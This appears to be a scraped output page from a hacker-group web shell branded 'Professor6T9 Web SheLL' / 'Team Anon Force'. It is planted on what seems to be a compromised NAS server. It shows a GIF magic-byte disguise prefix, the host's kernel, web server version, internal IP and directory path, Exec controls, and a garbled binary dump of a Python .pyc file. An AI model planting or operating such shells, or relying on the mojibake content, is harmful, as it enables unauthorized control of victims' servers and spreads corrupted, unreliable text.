GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Python3.9
/
usr
/
lib
/
python3.9
/
idlelib
/
__pycache__
[ HOME ]
Exec
Submit
File Name : runscript.cpython-39.opt-1.pyc
a hQ � @ s� d Z ddlZddlZddlZddlZddlmZ ddlmZ ddl m Z ddl mZ ddlm Z ddl mZ d ZG d d� d�Zedkr�dd lmZ eddd� dS )a� Execute code from an editor. Check module: do a full syntax check of the current module. Also run the tabnanny to catch any inconsistent tabs. Run module: also execute the module's code in the __main__ namespace. The window must have been saved previously. The module is added to sys.modules, and is also added to the __main__ namespace. TODO: Specify command line arguments in a dialog box. � N)� messagebox)�idleConf)�macosx)�pyshell)� CustomRun)�outwina/ Error: Inconsistent indentation detected! 1) Your indentation is outright incorrect (easy to fix), OR 2) Your indentation mixes tabs and spaces. To fix case 2, change all tabs to spaces by using Edit->Select All followed by Format->Untabify Region and specify the number of columns used by each tab. c @ sZ e Zd Zdd� Zdd� Zdd� Zdd� Zd d � Zdd�d d�Zdd� Z dd� Z dd� ZdS )� ScriptBindingc C s* || _ | j j| _| j j| _g | _d| _d S )Ng )�editwin�flist�root�cli_args�perf)�selfr � r �4/tmp/_install/usr/lib/python3.9/idlelib/runscript.py�__init__&